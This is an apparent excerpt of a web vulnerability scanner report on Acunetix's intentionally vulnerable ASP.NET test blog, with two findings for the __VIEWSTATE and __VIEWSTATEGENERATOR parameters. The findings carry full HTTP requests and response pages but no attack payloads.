vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:White" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8130&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDARzqXFtoIZGRkKgWe7vijcDIbQIYwCrqmWW7Tevw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKwicPNBQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDG5ajdlaDgDKpVniHzBItovlvBx4
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:04 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDARzqXFtoIZGRkKgWe7vijcDIbQIYwCrqmWW7Tevw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKwicPNBQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDG5ajdlaDgDKpVniHzBItovlvBx4" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:White" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> 